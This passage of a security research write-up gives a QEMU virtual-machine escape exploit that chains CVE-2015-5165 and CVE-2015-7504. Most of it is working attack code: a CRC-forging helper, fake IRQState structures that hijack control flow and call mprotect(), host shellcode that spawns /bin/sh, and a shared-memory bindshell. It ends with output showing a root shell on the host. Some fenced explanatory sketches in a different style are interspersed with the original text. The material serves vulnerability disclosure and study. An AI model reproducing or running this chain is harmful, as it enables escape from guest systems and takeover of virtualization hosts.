* x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1
*/
static const uint32_t crctab[256] = {
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818,
0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c,
0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086,
0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4,
0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad,
0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683,
0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe,
0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7,
0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252,
0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60,
0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79,
0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f,
0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04,
0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a,
0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21,
0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e,
0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45,
0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db,
0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0,
0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6,
0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf,
0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d,
};
/* CRC over size bytes: initial value ~0, no final XOR. */
uint32_t crc_compute(uint8_t *buffer, size_t size)
{
    uint32_t fcs = ~0;
    uint8_t *p = buffer;
    while (p != &buffer[size])
        CRC(fcs, *p++);
    return fcs;
}
/* Returns the 4 bytes to append to data whose CRC is `current` so that
 * the CRC of the patched data equals `target`. */
uint32_t crc_reverse(uint32_t current, uint32_t target)
{
    size_t i = 0, j;
    uint8_t *ptr;
    uint32_t workspace[2] = { current, target };
    for (i = 0; i < 2; i++)
        workspace[i] &= (uint32_t)~0;
    ptr = (uint8_t *)(workspace + 1);
    /* Walk the CRC backwards, one byte at a time, from the target. */
    for (i = 0; i < 4; i++) {
        j = 0;
        while(crctab[j] >> 24 != *(ptr + 3 - i)) j++;
        *((uint32_t *)(ptr - i)) ^= crctab[j];
        *(ptr - i - 1) ^= j;
    }
    return *(uint32_t *)(ptr - 4);
}
int main()
{
    uint32_t fcs;
    uint32_t buffer[2] = { 0xcafecafe };
    uint8_t *ptr = (uint8_t *)buffer;
    fcs = crc_compute(ptr, 4);
    printf("[+] current crc = 0x%08x, required crc = 0x%08x\n",
           fcs, 0xdeadbeef);
    fcs = crc_reverse(fcs, 0xdeadbeef);
    printf("[+] applying patch = 0x%08x\n", fcs);
    buffer[1] = fcs;
    fcs = crc_compute(ptr, 8);
    if (fcs == 0xdeadbeef)
        printf("[+] crc patched successfully\n");
    return 0;
}
----[ 4.4 - Exploit
The exploit (file cve-2015-7504.c from the attached source code tarball)
resets the card to its default settings, then configures Tx and Rx
descriptors and sets the required flags, and finally inits and restarts the
card to push our network card config.
The rest of the exploit simply triggers the vulnerability that crashes QEMU
with a single packet. As shown below, qemu_set_irq is called with a
corrupted irq variable pointing to 0x7f66deadbeef. QEMU crashes as there is
no runnable handler at this address.
(gdb) shell ps -e | grep qemu
8335 pts/4 00:00:03 qemu-system-x86
(gdb) attach 8335
...
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00007f669ce6c363 in qemu_set_irq (irq=0x7f66deadbeef, level=0)
43 irq->handler(irq->opaque, irq->n, level);
--[ 5 - Putting All Together
In this section, we merge the two previous exploits in order to escape from
the VM and get code execution on the host with QEMU's privileges.
First, we exploit CVE-2015-5165 in order to reconstruct the memory layout
of QEMU. More precisely, the exploit tries to resolve the following
addresses in order to bypass ASLR:
- The guest physical memory base address. In our exploit, we need to do
some allocations on the guest and get their precise address within the
virtual address space of QEMU.
- The .text section base address. This serves to get the address of
qemu_set_irq() function.
- The .plt section base address. This serves to determine the addresses of
some functions such as fork() and execv() used to build our shellcode.
The address of mprotect() is also needed to change the permissions of the
guest physical memory. Remember that the physical memory allocated for
the guest is not executable.
----[ 5.1 - RIP Control
As shown in section 4, we have control over the %rip register. Instead of
letting QEMU crash at an arbitrary address, we overflow the PCNET buffer
with an address pointing to a fake IRQState that calls a function of our
choice.
At first sight, one could be tempted to build a fake IRQState that runs
system(). However, this call will fail as some of QEMU's memory mappings
are not preserved across a fork() call. More precisely, the mmapped
physical memory is marked with the MADV_DONTFORK flag:
qemu_madvise(new_block->host, new_block->max_length, QEMU_MADV_DONTFORK);
Calling execv() is not useful too as we lose our hands on the guest
machine.
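The effect of MADV_DONTFORK can be observed in isolation. The following
Linux-only sketch is not part of the exploit; the function name
child_faults_on_dontfork() is made up for illustration. It maps an
anonymous page, marks it MADV_DONTFORK, forks, and reports whether the
child is killed by SIGSEGV when it touches the page.

```c
#define _GNU_SOURCE
#include <signal.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if a forked child faults on a MADV_DONTFORK mapping,
 * 0 if it does not, and -1 on setup failure. */
int child_faults_on_dontfork(void)
{
    size_t len = 4096;
    int status = 0;
    char *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return -1;
    p[0] = 'A';

    /* The range will not be mapped in children created by fork(). */
    if (madvise(p, len, MADV_DONTFORK) != 0) {
        munmap(p, len);
        return -1;
    }

    pid_t pid = fork();
    if (pid < 0) {
        munmap(p, len);
        return -1;
    }
    if (pid == 0) {
        volatile char c = p[0];     /* unmapped in the child: SIGSEGV */
        (void)c;
        _exit(0);
    }

    waitpid(pid, &status, 0);
    munmap(p, len);
    return WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV;
}
```

Calling madvise() with MADV_DOFORK on the same range before fork() restores
the default behaviour, which is what the shellcode of section 5.3 relies on.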
Note also that one can construct a shellcode by chaining several fake
IRQState structures in order to call multiple functions, since
qemu_set_irq() is called several times by the PCNET device emulator.
However, we found it more convenient and more reliable to execute a
shellcode after having enabled the PROT_EXEC flag on the memory page where
the shellcode is located.
Our idea is to build two fake IRQState structures. The first one is used
to make a call to mprotect(). The second one is used to call a shellcode
that first undoes the MADV_DONTFORK flag and then runs an interactive
shell between the guest and the host.
As stated earlier, qemu_set_irq() takes two parameters as input: irq (a
pointer to an IRQState structure) and level (the IRQ level). It then calls
the handler as follows:
    void qemu_set_irq(qemu_irq irq, int level)
    {
        if (!irq)
            return;
        irq->handler(irq->opaque, irq->n, level);
    }
As shown above, we have control only over the first two parameters. So how
can we call mprotect(), which takes three arguments?
To overcome this, we first make qemu_set_irq() call itself with the
following parameters:
- irq: pointer to a fake IRQState whose handler pointer is set to the
  mprotect() function.
- level: mprotect flags set to PROT_READ | PROT_WRITE | PROT_EXEC
This is achieved by setting up two fake IRQState structures, as shown in
the following code snippet:
    struct IRQState {
        uint8_t  _nothing[44];
        uint64_t handler;
        uint64_t arg_1;
        int32_t  arg_2;
    };

    struct IRQState fake_irq[2];
    hptr_t fake_irq_mem = gva_to_hva(fake_irq);

    /* do qemu_set_irq */
    fake_irq[0].handler = qemu_set_irq_addr;
    fake_irq[0].arg_1 = fake_irq_mem + sizeof(struct IRQState);
    fake_irq[0].arg_2 = PROT_READ | PROT_WRITE | PROT_EXEC;

    /* do mprotect */
    fake_irq[1].handler = mprotect_addr;
    fake_irq[1].arg_1 = (fake_irq_mem >> PAGE_SHIFT) << PAGE_SHIFT;
    fake_irq[1].arg_2 = PAGE_SIZE;
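The shift pair in the mprotect stage rounds the address down to a page
boundary, since mprotect() rejects addresses that are not page-aligned.
A minimal sketch of that arithmetic, assuming 4 KiB pages (the macro and
function names below are hypothetical):

```c
#include <stdint.h>

#define DEMO_PAGE_SHIFT 12                      /* assumes 4 KiB pages */
#define DEMO_PAGE_SIZE  (1ULL << DEMO_PAGE_SHIFT)

/* Clears the low DEMO_PAGE_SHIFT bits; equivalent to
 * addr & ~(DEMO_PAGE_SIZE - 1). */
uint64_t page_align_down(uint64_t addr)
{
    return (addr >> DEMO_PAGE_SHIFT) << DEMO_PAGE_SHIFT;
}
```

For instance, the shellcode address 0x7fb6a89132d0 from the sample run in
section 5.3 rounds down to 0x7fb6a8913000, the address of the payload.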
After the overflow takes place, qemu_set_irq() is called with a fake
handler that simply calls qemu_set_irq() again, which in turn calls
mprotect() after having set the level parameter to 7 (the protection flags
required by mprotect()).
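The argument shuffling can be checked with a harmless user-space model.
Everything below is hypothetical and only mimics the shape of
qemu_set_irq(): the structure, the adapter and the logging target are
stand-ins, and the target merely records its arguments instead of calling
mprotect().

```c
#include <stddef.h>

typedef void (*irq_handler)(void *opaque, int n, int level);

struct model_irq {
    irq_handler handler;
    void *opaque;
    int n;
};

/* Same shape as qemu_set_irq(): two stored fields plus level. */
static void model_set_irq(struct model_irq *irq, int level)
{
    if (!irq)
        return;
    irq->handler(irq->opaque, irq->n, level);
}

/* Adapter so the dispatcher can be used as a handler in portable C:
 * opaque becomes irq, n becomes level, the third argument is dropped. */
static void model_set_irq_as_handler(void *opaque, int n, int level)
{
    (void)level;
    model_set_irq(opaque, n);
}

/* Stand-in for a three-argument function such as
 * mprotect(addr, len, prot); it only logs what it receives. */
struct call_log { void *addr; int len; int prot; int calls; };
static struct call_log last_call;

static void three_arg_target(void *addr, int len, int prot)
{
    last_call.addr = addr;
    last_call.len = len;
    last_call.prot = prot;
    last_call.calls++;
}

/* Builds the two-stage chain and fires it once. */
void run_chain(void *addr, int len, int prot)
{
    struct model_irq stage[2];

    stage[1].handler = three_arg_target;    /* second stage: the target */
    stage[1].opaque = addr;
    stage[1].n = len;

    stage[0].handler = model_set_irq_as_handler;  /* first stage: re-entry */
    stage[0].opaque = &stage[1];
    stage[0].n = prot;                      /* becomes level on re-entry */

    model_set_irq(&stage[0], 0);
}
```

The value stored in the n field of the first stage ends up as the third
argument of the target, which is how the otherwise uncontrolled level
parameter gets a chosen value.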
Once the memory is executable, we can pass control to our interactive
shell by rewriting the handler of the first IRQState to the address of our
shellcode:
    payload.fake_irq[0].handler = shellcode_addr;
    payload.fake_irq[0].arg_1 = shellcode_data;
----[ 5.2 - Interactive Shell
We could simply write a basic shellcode that binds a shell to some port
with netcat and then connect to that shell from a separate machine. That's
a satisfactory solution, but we can do better and avoid firewall
restrictions: we can leverage memory shared between the guest and the host
to build a bindshell.
Exploiting QEMU vulnerabilities has a convenient property: the code we
write in the guest is already available in the QEMU process memory. So
there is no need to inject a shellcode. Even better, we can share code and
make it run on both the guest and the attacked host.
The figure below summarizes the shared memory and the processes and threads
running on the host and the guest.
We create two shared ring buffers (in and out) and provide read/write
primitives with spin-lock access to those shared memory areas. On the host
machine, we run a shellcode that starts a /bin/sh shell in a separate
process after having first duplicated its stdin and stdout file
descriptors. We also create two threads. The first one reads commands from
the shared memory and passes them to the shell via a pipe. The second
thread reads the output of the shell (from a second pipe) and then writes
it to the shared memory.
Two matching threads are also instantiated on the guest machine: one writes
user input commands to the dedicated shared memory, and the other outputs
the results read from the second ring buffer to stdout.
Note that in our exploit, we have a third thread (and a dedicated shared
area) to handle stderr output.
     GUEST                    SHARED MEMORY                    HOST
     -----                    -------------                    ----

 +------------+                                          +------------+
 |  exploit   |                                          |    QEMU    |
 |  (thread)  |                                          |   (main)   |
 +------------+                                          +------------+

 +------------+                                          +------------+
 |  exploit   | sm_write()        head        sm_read()  |    QEMU    |
 |  (thread)  |----------+         |---------------------|  (thread)  |
 +------------+          |         V                     +---------++-+
                         |     xxxxxxxxxxxxxx----+          pipe IN ||
                         |     x                 |       +---------++-+
                         |     x ring buffer     |       |   shell    |
               tail ------>    x (filled with x) ^       | fork proc. |
                         |                       |       +---------++-+
                         +-------->--------------+         pipe OUT ||
 +------------+                                          +---------++-+
 |  exploit   | sm_read()         tail        sm_write() |    QEMU    |
 |  (thread)  |----------+         |---------------------|  (thread)  |
 +------------+          |         V                     +------------+
                         |     xxxxxxxxxxxxxx----+
                         |     x                 |
                         |     x ring buffer     |
               head ------>    x (filled with x) ^
                         |                       |
                         +-------->--------------+
----[ 5.3 - VM-Escape Exploit
In this section, we outline the main structures and functions used in the
full exploit (vm-escape.c).
The injected payload is defined by the following structure:
    struct payload {
        struct IRQState    fake_irq[2];
        struct shared_data shared_data;
        uint8_t            shellcode[1024];
        uint8_t            pipe_fd2r[1024];
        uint8_t            pipe_r2fd[1024];
    };
Here, fake_irq is a pair of fake IRQState structures responsible for
calling mprotect() and changing the protection of the page where the
payload resides.
The structure shared_data is used to pass arguments to the main shellcode:
    struct shared_data {
        struct GOT       got;
        uint8_t          shell[64];
        hptr_t           addr;
        struct shared_io shared_io;
        volatile int     done;
    };
Here, the got structure acts as a Global Offset Table. It contains the
addresses of the functions called by the shellcode. The addresses of these
functions are resolved from the memory leak.
    struct GOT {
        typeof(open)           *open;
        typeof(close)          *close;
        typeof(read)           *read;
        typeof(write)          *write;
        typeof(dup2)           *dup2;
        typeof(pipe)           *pipe;
        typeof(fork)           *fork;
        typeof(execv)          *execv;
        typeof(malloc)         *malloc;
        typeof(madvise)        *madvise;
        typeof(pthread_create) *pthread_create;
        typeof(pipe_r2fd)      *pipe_r2fd;
        typeof(pipe_fd2r)      *pipe_fd2r;
    };
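The point of such a table is that code calling through it never references
a libc symbol directly, so the same compiled function works wherever the
table has been filled in. The following reduced sketch shows the pattern
in an ordinary process; struct mini_got and roundtrip() are hypothetical
names, and __typeof__ is the GNU spelling of the typeof operator used
above.

```c
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* A reduced function table in the style of struct GOT. */
struct mini_got {
    __typeof__(read)  *read;
    __typeof__(write) *write;
    __typeof__(pipe)  *pipe;
    __typeof__(close) *close;
};

/* Sends msg through a pipe and reads it back, calling only through
 * the table. Returns 0 on success, -1 on failure. */
int roundtrip(const struct mini_got *got, const char *msg,
              char *out, size_t outsz)
{
    int fds[2];
    size_t len = strlen(msg);
    ssize_t w, r;

    if (len >= outsz || got->pipe(fds) != 0)
        return -1;

    w = got->write(fds[1], msg, len);
    r = (w == (ssize_t)len) ? got->read(fds[0], out, len) : -1;
    got->close(fds[0]);
    got->close(fds[1]);

    if (r != (ssize_t)len)
        return -1;
    out[len] = '\0';
    return 0;
}
```

In a regular program the table is filled with the addresses of the libc
functions themselves, which is what session() does later in this section
for read() and write().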
The main shellcode is defined by the following function:
    /* main code to run after %rip control */
    void shellcode(struct shared_data *shared_data)
    {
        pthread_t t_in, t_out, t_err;
        int in_fds[2], out_fds[2], err_fds[2];
        struct brwpipe *in, *out, *err;
        char *args[2] = { shared_data->shell, NULL };

        if (shared_data->done) {
            return;
        }

        shared_data->got.madvise((uint64_t *)shared_data->addr,
                                 PHY_RAM, MADV_DOFORK);

        shared_data->got.pipe(in_fds);
        shared_data->got.pipe(out_fds);
        shared_data->got.pipe(err_fds);

        in = shared_data->got.malloc(sizeof(struct brwpipe));
        out = shared_data->got.malloc(sizeof(struct brwpipe));
        err = shared_data->got.malloc(sizeof(struct brwpipe));

        in->got = &shared_data->got;
        out->got = &shared_data->got;
        err->got = &shared_data->got;

        in->fd = in_fds[1];
        out->fd = out_fds[0];
        err->fd = err_fds[0];

        in->ring = &shared_data->shared_io.in;
        out->ring = &shared_data->shared_io.out;
        err->ring = &shared_data->shared_io.err;

        if (shared_data->got.fork() == 0) {
            shared_data->got.close(in_fds[1]);
            shared_data->got.close(out_fds[0]);
            shared_data->got.close(err_fds[0]);
            shared_data->got.dup2(in_fds[0], 0);
            shared_data->got.dup2(out_fds[1], 1);
            shared_data->got.dup2(err_fds[1], 2);
            shared_data->got.execv(shared_data->shell, args);
        }
        else {
            shared_data->got.close(in_fds[0]);
            shared_data->got.close(out_fds[1]);
            shared_data->got.close(err_fds[1]);

            shared_data->got.pthread_create(&t_in, NULL,
                                            shared_data->got.pipe_r2fd, in);
            shared_data->got.pthread_create(&t_out, NULL,
                                            shared_data->got.pipe_fd2r, out);
            shared_data->got.pthread_create(&t_err, NULL,
                                            shared_data->got.pipe_fd2r, err);

            shared_data->done = 1;
        }
    }
The shellcode first checks the flag shared_data->done to avoid running
multiple times (remember that qemu_set_irq(), which is used to pass control
to the shellcode, is called several times by QEMU code).
The shellcode calls madvise() with shared_data->addr pointing to the
physical memory. This is necessary to undo the MADV_DONTFORK flag and hence
preserve memory mappings across fork() calls.
The shellcode creates a child process that is responsible for starting a
shell ("/bin/sh"). The parent process starts threads that make use of
shared memory areas to pass shell commands from the guest to the attacked
host and then write back the results of these commands to the guest
machine. The communication between the parent and the child process is
carried by pipes.
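The pipe plumbing between parent and child is the classic pipe(), fork(),
dup2(), execv() sequence. The sketch below shows it as an ordinary program
fragment, independent of the exploit: run_via_pipes() is a hypothetical
helper that feeds one short command line to /bin/sh through a pipe and
collects what the shell prints. It handles stdout only and assumes the
command is small enough to fit in the pipe buffer.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Sends cmd to a /bin/sh child over a pipe and stores the child's
 * stdout in out (NUL-terminated). Returns the byte count or -1. */
ssize_t run_via_pipes(const char *cmd, char *out, size_t outsz)
{
    int in_fds[2], out_fds[2];
    size_t total = 0;
    ssize_t n;
    pid_t pid;

    if (outsz == 0 || pipe(in_fds) < 0)
        return -1;
    if (pipe(out_fds) < 0) {
        close(in_fds[0]);
        close(in_fds[1]);
        return -1;
    }

    pid = fork();
    if (pid < 0) {
        close(in_fds[0]);  close(in_fds[1]);
        close(out_fds[0]); close(out_fds[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: read end of "in" becomes stdin, write end of "out"
         * becomes stdout, then the shell replaces the process. */
        char *args[] = { "/bin/sh", NULL };
        close(in_fds[1]);
        close(out_fds[0]);
        dup2(in_fds[0], STDIN_FILENO);
        dup2(out_fds[1], STDOUT_FILENO);
        close(in_fds[0]);
        close(out_fds[1]);
        execv(args[0], args);
        _exit(127);
    }

    /* Parent: keep only the ends the child does not use. */
    close(in_fds[0]);
    close(out_fds[1]);
    if (write(in_fds[1], cmd, strlen(cmd)) < 0)
        total = 0;                  /* nothing sent, read will see EOF */
    close(in_fds[1]);               /* EOF on stdin ends the shell */

    while (total < outsz - 1 &&
           (n = read(out_fds[0], out + total, outsz - 1 - total)) > 0)
        total += (size_t)n;
    out[total] = '\0';

    close(out_fds[0]);
    waitpid(pid, NULL, 0);
    return (ssize_t)total;
}
```

The shellcode differs in that it keeps the pipes open and hands each end
to a dedicated thread, so the shell stays interactive instead of exiting
after a single command.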
As shown below, a shared memory area consists of a ring buffer that is
accessed by sm_read() and sm_write() primitives:
    struct shared_ring_buf {
        volatile bool lock;
        bool empty;
        uint8_t head;
        uint8_t tail;
        uint8_t buf[SHARED_BUFFER_SIZE];
    };

    static inline
    __attribute__((always_inline))
    ssize_t sm_read(struct GOT *got, struct shared_ring_buf *ring,
                    char *out, ssize_t len)
    {
        ssize_t read = 0, available = 0;

        do {
            /* spin lock */
            while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED));

            if (ring->head > ring->tail) { // loop on ring
                available = SHARED_BUFFER_SIZE - ring->head;
            } else {
                available = ring->tail - ring->head;
                if (available == 0 && !ring->empty) {
                    available = SHARED_BUFFER_SIZE - ring->head;
                }
            }
            available = MIN(len - read, available);

            imemcpy(out, ring->buf + ring->head, available);
            read += available;
            out += available;
            ring->head += available;

            if (ring->head == SHARED_BUFFER_SIZE)
                ring->head = 0;

            if (available != 0 && ring->head == ring->tail)
                ring->empty = true;

            __atomic_clear(&ring->lock, __ATOMIC_RELAXED);
        } while (available != 0 || read == 0);

        return read;
    }

    static inline
    __attribute__((always_inline))
    ssize_t sm_write(struct GOT *got, struct shared_ring_buf *ring,
                     char *in, ssize_t len)
    {
        ssize_t written = 0, available = 0;

        do {
            /* spin lock */
            while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED));

            if (ring->tail > ring->head) { // loop on ring
                available = SHARED_BUFFER_SIZE - ring->tail;
            } else {
                available = ring->head - ring->tail;
                if (available == 0 && ring->empty) {
                    available = SHARED_BUFFER_SIZE - ring->tail;
                }
            }
            available = MIN(len - written, available);

            imemcpy(ring->buf + ring->tail, in, available);
            written += available;
            in += available;
            ring->tail += available;

            if (ring->tail == SHARED_BUFFER_SIZE)
                ring->tail = 0;

            if (available != 0)
                ring->empty = false;

            __atomic_clear(&ring->lock, __ATOMIC_RELAXED);
        } while (written != len);

        return written;
    }
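To experiment with the head/tail/empty bookkeeping outside the exploit, a
reduced, non-blocking variant can be handy. The sketch below is not the
authors' code: the names and the 16-byte size are hypothetical, the
functions return immediately with a short count instead of spinning until
data or room is available, and the spin lock uses acquire/release ordering
(the conventional choice for a lock) rather than __ATOMIC_RELAXED.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define RING_SIZE 16    /* hypothetical, small so wrap-around is visible */

struct ring {
    volatile bool lock;
    bool empty;             /* tells "empty" from "full" when head == tail */
    size_t head;            /* next byte to read */
    size_t tail;            /* next byte to write */
    uint8_t buf[RING_SIZE];
};

void ring_init(struct ring *r)
{
    r->lock = false;
    r->empty = true;
    r->head = r->tail = 0;
}

static void ring_lock(struct ring *r)
{
    while (__atomic_test_and_set(&r->lock, __ATOMIC_ACQUIRE))
        ;                   /* spin */
}

static void ring_unlock(struct ring *r)
{
    __atomic_clear(&r->lock, __ATOMIC_RELEASE);
}

/* Number of bytes currently stored (caller holds the lock). */
static size_t ring_used(const struct ring *r)
{
    if (r->empty)
        return 0;
    if (r->tail > r->head)
        return r->tail - r->head;
    return RING_SIZE - r->head + r->tail;   /* wrapped, or full */
}

/* Stores up to len bytes; returns how many were stored. */
size_t ring_put(struct ring *r, const uint8_t *in, size_t len)
{
    size_t n = 0, room;

    ring_lock(r);
    room = RING_SIZE - ring_used(r);
    while (n < len && n < room) {
        r->buf[r->tail] = in[n++];
        r->tail = (r->tail + 1) % RING_SIZE;
    }
    if (n != 0)
        r->empty = false;
    ring_unlock(r);
    return n;
}

/* Fetches up to len bytes; returns how many were fetched. */
size_t ring_get(struct ring *r, uint8_t *out, size_t len)
{
    size_t n = 0, used;

    ring_lock(r);
    used = ring_used(r);
    while (n < len && n < used) {
        out[n++] = r->buf[r->head];
        r->head = (r->head + 1) % RING_SIZE;
    }
    if (n != 0 && r->head == r->tail)
        r->empty = true;
    ring_unlock(r);
    return n;
}
```

As in sm_read() and sm_write(), head == tail is ambiguous on its own, and
the empty flag is what distinguishes a drained buffer from a full one.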
These primitives are used by the following thread functions. The first one
reads data from a shared memory area and writes it to a file descriptor.
The second one reads data from a file descriptor and writes it to a shared
memory area.
    void *pipe_r2fd(void *_brwpipe)
    {
        struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe;
        char buf[SHARED_BUFFER_SIZE];
        ssize_t len;

        while (true) {
            len = sm_read(brwpipe->got, brwpipe->ring, buf, sizeof(buf));
            if (len > 0)
                brwpipe->got->write(brwpipe->fd, buf, len);
        }

        return NULL;
    } SHELLCODE(pipe_r2fd)

    void *pipe_fd2r(void *_brwpipe)
    {
        struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe;
        char buf[SHARED_BUFFER_SIZE];
        ssize_t len;

        while (true) {
            len = brwpipe->got->read(brwpipe->fd, buf, sizeof(buf));
            if (len < 0) {
                return NULL;
            } else if (len > 0) {
                len = sm_write(brwpipe->got, brwpipe->ring, buf, len);
            }
        }

        return NULL;
    }
Note that the code of these functions is shared between the host and the
guest. These threads are also instantiated in the guest machine to read
user input commands and copy them to the dedicated shared memory area (the
in ring), and to write back the output of these commands available in the
corresponding shared memory areas (the out and err rings):
    void session(struct shared_io *shared_io)
    {
        size_t len;
        pthread_t t_in, t_out, t_err;
        struct GOT got;
        struct brwpipe *in, *out, *err;

        got.read = &read;
        got.write = &write;

        warnx("[!] enjoy your shell");
        fputs(COLOR_SHELL, stderr);

        in = malloc(sizeof(struct brwpipe));
        out = malloc(sizeof(struct brwpipe));
        err = malloc(sizeof(struct brwpipe));

        in->got = &got;
        out->got = &got;
        err->got = &got;

        in->fd = STDIN_FILENO;
        out->fd = STDOUT_FILENO;
        err->fd = STDERR_FILENO;

        in->ring = &shared_io->in;
        out->ring = &shared_io->out;
        err->ring = &shared_io->err;

        pthread_create(&t_in, NULL, pipe_fd2r, in);
        pthread_create(&t_out, NULL, pipe_r2fd, out);
        pthread_create(&t_err, NULL, pipe_r2fd, err);

        pthread_join(t_in, NULL);
        pthread_join(t_out, NULL);
        pthread_join(t_err, NULL);
    }
The figure presented in the previous section illustrates the shared
memories and the processes/threads started in the guest and the host
machines.
The exploit targets a vulnerable version of QEMU built with GCC version
4.9.2. In order to adapt the exploit to a specific QEMU build, we provide
a shell script (build-exploit.sh) that outputs a C header with the
required offsets:
$ ./build-exploit <path-to-qemu-binary> > qemu.h
Running the full exploit (vm-escape.c) will result in the following output:
$ ./vm-escape
$ exploit: [+] found 190 potential ObjectProperty structs in memory
$ exploit: [+] .text mapped at 0x7fb6c55c3620
$ exploit: [+] mprotect mapped at 0x7fb6c55c0f10
$ exploit: [+] qemu_set_irq mapped at 0x7fb6c5795347
$ exploit: [+] VM physical memory mapped at 0x7fb630000000
$ exploit: [+] payload at 0x7fb6a8913000
$ exploit: [+] patching packet ...
$ exploit: [+] running first attack stage
$ exploit: [+] running shellcode at 0x7fb6a89132d0
$ exploit: [!] enjoy your shell
$ shell > id
$ uid=0(root) gid=0(root) ...
----[ 5.4 - Limitations
Please note that the current exploit is still somewhat unreliable. In our
testing environment (Debian 7 running a 3.16 kernel on the x86_64
architecture), we have observed a failure rate of approximately 1 in 10
runs. In most unsuccessful attempts, the exploit fails to reconstruct the
memory layout of QEMU due to unusable leaked data.
The exploit does not work on Linux kernels compiled without the
CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. In this case the QEMU binary
(compiled by default with -fPIE) is mapped into a separate address range,
as shown by the following listing:
55e5e3fdd000-55e5e4594000 r-xp 00000000 fe:01 6940407 [qemu-system-x86_64]
55e5e4794000-55e5e4862000 r--p 005b7000 fe:01 6940407 ...
